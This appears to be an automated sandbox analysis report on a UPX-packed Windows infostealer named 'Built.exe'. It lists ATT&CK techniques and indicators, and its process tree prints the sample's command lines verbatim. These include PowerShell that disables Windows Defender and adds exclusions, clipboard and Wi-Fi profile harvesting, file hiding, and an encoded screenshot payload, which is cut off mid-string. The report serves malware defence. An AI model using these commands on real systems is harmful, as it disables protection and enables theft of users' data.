c99ef8a77872dcc4619828d3a89422e5f385b6f6146500f8683e145f968d9aed

Analysis

max time kernel
95s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30/11/2024, 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

5.9MB
MD5

5bc3f4b5d51eb836a100cfdaeb523463
SHA1

8d7e261a6f9db90cc24cab7ba4b9716ad89b066e
SHA256

c99ef8a77872dcc4619828d3a89422e5f385b6f6146500f8683e145f968d9aed
SHA512

bf5d9b435bbd40038096968ca0404bdfd4f55b231873dceef525bc26c5fee38837eab568da051ace5ee3587aec0c9dfe87ff306416eb1071ddcb0d9e606347c4
SSDEEP

98304:bo+nh24Ri65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF49h/krfusU6:b7nZDOYjJlpZstQoS9Hf12VKXfb/C0VQ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2272	powershell.exe
3328	powershell.exe
2724	powershell.exe
2768	powershell.exe
2160	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1896	cmd.exe
4020	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4508	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe
4024	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
28	discord.com
31	discord.com
83	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
26	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2908	tasklist.exe
3980	tasklist.exe
4532	tasklist.exe
2876	tasklist.exe
3944	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1196	cmd.exe

UPX packed file 46 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b98-21.dat	upx
behavioral2/memory/4024-25-0x00007FFCE7150000-0x00007FFCE75B5000-memory.dmp	upx
behavioral2/files/0x000a000000023b8b-27.dat	upx
behavioral2/memory/4024-30-0x00007FFCFA0D0000-0x00007FFCFA0F4000-memory.dmp	upx
behavioral2/files/0x000a000000023b96-29.dat	upx
behavioral2/memory/4024-48-0x00007FFCFFA20000-0x00007FFCFFA2F000-memory.dmp	upx
behavioral2/files/0x000a000000023b92-47.dat	upx
behavioral2/files/0x000a000000023b91-46.dat	upx
behavioral2/files/0x000a000000023b90-45.dat	upx
behavioral2/files/0x000a000000023b8f-44.dat	upx
behavioral2/files/0x000a000000023b8e-43.dat	upx
behavioral2/files/0x000a000000023b8d-42.dat	upx
behavioral2/files/0x000a000000023b8c-41.dat	upx
behavioral2/files/0x000a000000023b8a-40.dat	upx
behavioral2/files/0x000a000000023b9d-39.dat	upx
behavioral2/files/0x000a000000023b9c-38.dat	upx
behavioral2/files/0x000a000000023b9b-37.dat	upx
behavioral2/files/0x000a000000023b97-34.dat	upx
behavioral2/files/0x000a000000023b95-33.dat	upx
behavioral2/memory/4024-54-0x00007FFCFA0A0000-0x00007FFCFA0CC000-memory.dmp	upx
behavioral2/memory/4024-56-0x00007FFCF9FD0000-0x00007FFCF9FE8000-memory.dmp	upx
behavioral2/memory/4024-58-0x00007FFCF6B10000-0x00007FFCF6B2E000-memory.dmp	upx
behavioral2/memory/4024-60-0x00007FFCF61D0000-0x00007FFCF6341000-memory.dmp	upx
behavioral2/memory/4024-62-0x00007FFCF6AF0000-0x00007FFCF6B09000-memory.dmp	upx
behavioral2/memory/4024-64-0x00007FFCF6AE0000-0x00007FFCF6AED000-memory.dmp	upx
behavioral2/memory/4024-66-0x00007FFCF67E0000-0x00007FFCF680E000-memory.dmp	upx
behavioral2/memory/4024-74-0x00007FFCFA0D0000-0x00007FFCFA0F4000-memory.dmp	upx
behavioral2/memory/4024-73-0x00007FFCE6DD0000-0x00007FFCE7147000-memory.dmp	upx
behavioral2/memory/4024-71-0x00007FFCF64E0000-0x00007FFCF6597000-memory.dmp	upx
behavioral2/memory/4024-70-0x00007FFCE7150000-0x00007FFCE75B5000-memory.dmp	upx
behavioral2/memory/4024-76-0x00007FFCF5F50000-0x00007FFCF5F65000-memory.dmp	upx
behavioral2/memory/4024-78-0x00007FFCF5F40000-0x00007FFCF5F4D000-memory.dmp	upx
behavioral2/memory/4024-80-0x00007FFCE6CB0000-0x00007FFCE6DC8000-memory.dmp	upx
behavioral2/memory/4024-105-0x00007FFCF6B10000-0x00007FFCF6B2E000-memory.dmp	upx
behavioral2/memory/4024-106-0x00007FFCF61D0000-0x00007FFCF6341000-memory.dmp	upx
behavioral2/memory/4024-109-0x00007FFCF6AF0000-0x00007FFCF6B09000-memory.dmp	upx
behavioral2/memory/4024-173-0x00007FFCF6AE0000-0x00007FFCF6AED000-memory.dmp	upx
behavioral2/memory/4024-211-0x00007FFCF67E0000-0x00007FFCF680E000-memory.dmp	upx
behavioral2/memory/4024-268-0x00007FFCF64E0000-0x00007FFCF6597000-memory.dmp	upx
behavioral2/memory/4024-271-0x00007FFCE6DD0000-0x00007FFCE7147000-memory.dmp	upx
behavioral2/memory/4024-287-0x00007FFCF6B10000-0x00007FFCF6B2E000-memory.dmp	upx
behavioral2/memory/4024-283-0x00007FFCFA0D0000-0x00007FFCFA0F4000-memory.dmp	upx
behavioral2/memory/4024-282-0x00007FFCE7150000-0x00007FFCE75B5000-memory.dmp	upx
behavioral2/memory/4024-288-0x00007FFCF61D0000-0x00007FFCF6341000-memory.dmp	upx
behavioral2/memory/4024-322-0x00007FFCE7150000-0x00007FFCE75B5000-memory.dmp	upx
behavioral2/memory/4024-361-0x00007FFCE7150000-0x00007FFCE75B5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2332	cmd.exe
1596	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4108	WMIC.exe
3196	WMIC.exe
1268	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
292	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133774785533482374"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2272	powershell.exe
2160	powershell.exe
2160	powershell.exe
2272	powershell.exe
3328	powershell.exe
3328	powershell.exe
4020	powershell.exe
4020	powershell.exe
2616	powershell.exe
2616	powershell.exe
4020	powershell.exe
2616	powershell.exe
2724	powershell.exe
2724	powershell.exe
3580	powershell.exe
3580	powershell.exe
2768	powershell.exe
2768	powershell.exe
4572	powershell.exe
4572	powershell.exe
3920	chrome.exe
3920	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2908	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeIncreaseQuotaPrivilege	2976	WMIC.exe
Token: SeSecurityPrivilege	2976	WMIC.exe
Token: SeTakeOwnershipPrivilege	2976	WMIC.exe
Token: SeLoadDriverPrivilege	2976	WMIC.exe
Token: SeSystemProfilePrivilege	2976	WMIC.exe
Token: SeSystemtimePrivilege	2976	WMIC.exe
Token: SeProfSingleProcessPrivilege	2976	WMIC.exe
Token: SeIncBasePriorityPrivilege	2976	WMIC.exe
Token: SeCreatePagefilePrivilege	2976	WMIC.exe
Token: SeBackupPrivilege	2976	WMIC.exe
Token: SeRestorePrivilege	2976	WMIC.exe
Token: SeShutdownPrivilege	2976	WMIC.exe
Token: SeDebugPrivilege	2976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2976	WMIC.exe
Token: SeRemoteShutdownPrivilege	2976	WMIC.exe
Token: SeUndockPrivilege	2976	WMIC.exe
Token: SeManageVolumePrivilege	2976	WMIC.exe
Token: 33	2976	WMIC.exe
Token: 34	2976	WMIC.exe
Token: 35	2976	WMIC.exe
Token: 36	2976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1268	WMIC.exe
Token: SeSecurityPrivilege	1268	WMIC.exe
Token: SeTakeOwnershipPrivilege	1268	WMIC.exe
Token: SeLoadDriverPrivilege	1268	WMIC.exe
Token: SeSystemProfilePrivilege	1268	WMIC.exe
Token: SeSystemtimePrivilege	1268	WMIC.exe
Token: SeProfSingleProcessPrivilege	1268	WMIC.exe
Token: SeIncBasePriorityPrivilege	1268	WMIC.exe
Token: SeCreatePagefilePrivilege	1268	WMIC.exe
Token: SeBackupPrivilege	1268	WMIC.exe
Token: SeRestorePrivilege	1268	WMIC.exe
Token: SeShutdownPrivilege	1268	WMIC.exe
Token: SeDebugPrivilege	1268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1268	WMIC.exe
Token: SeRemoteShutdownPrivilege	1268	WMIC.exe
Token: SeUndockPrivilege	1268	WMIC.exe
Token: SeManageVolumePrivilege	1268	WMIC.exe
Token: 33	1268	WMIC.exe
Token: 34	1268	WMIC.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe
3920	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2836 wrote to memory of 4024	2836	Built.exe	82
PID 2836 wrote to memory of 4024	2836	Built.exe	82
PID 4024 wrote to memory of 4548	4024	Built.exe	83
PID 4024 wrote to memory of 4548	4024	Built.exe	83
PID 4024 wrote to memory of 3440	4024	Built.exe	84
PID 4024 wrote to memory of 3440	4024	Built.exe	84
PID 4024 wrote to memory of 3448	4024	Built.exe	87
PID 4024 wrote to memory of 3448	4024	Built.exe	87
PID 4024 wrote to memory of 2548	4024	Built.exe	89
PID 4024 wrote to memory of 2548	4024	Built.exe	89
PID 3448 wrote to memory of 2908	3448	cmd.exe	91
PID 3448 wrote to memory of 2908	3448	cmd.exe	91
PID 4548 wrote to memory of 2272	4548	cmd.exe	92
PID 4548 wrote to memory of 2272	4548	cmd.exe	92
PID 3440 wrote to memory of 2160	3440	cmd.exe	93
PID 3440 wrote to memory of 2160	3440	cmd.exe	93
PID 2548 wrote to memory of 2976	2548	cmd.exe	94
PID 2548 wrote to memory of 2976	2548	cmd.exe	94
PID 4024 wrote to memory of 1708	4024	Built.exe	96
PID 4024 wrote to memory of 1708	4024	Built.exe	96
PID 1708 wrote to memory of 2584	1708	cmd.exe	98
PID 1708 wrote to memory of 2584	1708	cmd.exe	98
PID 4024 wrote to memory of 1692	4024	Built.exe	99
PID 4024 wrote to memory of 1692	4024	Built.exe	99
PID 1692 wrote to memory of 4716	1692	cmd.exe	101
PID 1692 wrote to memory of 4716	1692	cmd.exe	101
PID 4024 wrote to memory of 3640	4024	Built.exe	102
PID 4024 wrote to memory of 3640	4024	Built.exe	102
PID 3640 wrote to memory of 1268	3640	cmd.exe	104
PID 3640 wrote to memory of 1268	3640	cmd.exe	104
PID 4024 wrote to memory of 1888	4024	Built.exe	105
PID 4024 wrote to memory of 1888	4024	Built.exe	105
PID 1888 wrote to memory of 4108	1888	cmd.exe	107
PID 1888 wrote to memory of 4108	1888	cmd.exe	107
PID 4024 wrote to memory of 1196	4024	Built.exe	108
PID 4024 wrote to memory of 1196	4024	Built.exe	108
PID 4024 wrote to memory of 3320	4024	Built.exe	110
PID 4024 wrote to memory of 3320	4024	Built.exe	110
PID 1196 wrote to memory of 3916	1196	cmd.exe	112
PID 1196 wrote to memory of 3916	1196	cmd.exe	112
PID 3320 wrote to memory of 3328	3320	cmd.exe	113
PID 3320 wrote to memory of 3328	3320	cmd.exe	113
PID 4024 wrote to memory of 4752	4024	Built.exe	114
PID 4024 wrote to memory of 4752	4024	Built.exe	114
PID 4024 wrote to memory of 1948	4024	Built.exe	115
PID 4024 wrote to memory of 1948	4024	Built.exe	115
PID 4752 wrote to memory of 3980	4752	cmd.exe	118
PID 4752 wrote to memory of 3980	4752	cmd.exe	118
PID 1948 wrote to memory of 4532	1948	cmd.exe	119
PID 1948 wrote to memory of 4532	1948	cmd.exe	119
PID 4024 wrote to memory of 4784	4024	Built.exe	120
PID 4024 wrote to memory of 4784	4024	Built.exe	120
PID 4024 wrote to memory of 1896	4024	Built.exe	121
PID 4024 wrote to memory of 1896	4024	Built.exe	121
PID 4024 wrote to memory of 3520	4024	Built.exe	123
PID 4024 wrote to memory of 3520	4024	Built.exe	123
PID 4024 wrote to memory of 1704	4024	Built.exe	125
PID 4024 wrote to memory of 1704	4024	Built.exe	125
PID 4024 wrote to memory of 2332	4024	Built.exe	126
PID 4024 wrote to memory of 2332	4024	Built.exe	126
PID 4024 wrote to memory of 2468	4024	Built.exe	129
PID 4024 wrote to memory of 2468	4024	Built.exe	129
PID 4024 wrote to memory of 2288	4024	Built.exe	131
PID 4024 wrote to memory of 2288	4024	Built.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3916	attrib.exe
1064	attrib.exe
2148	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2836
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4784
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3520
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1704
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2332
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2468
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2288
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAI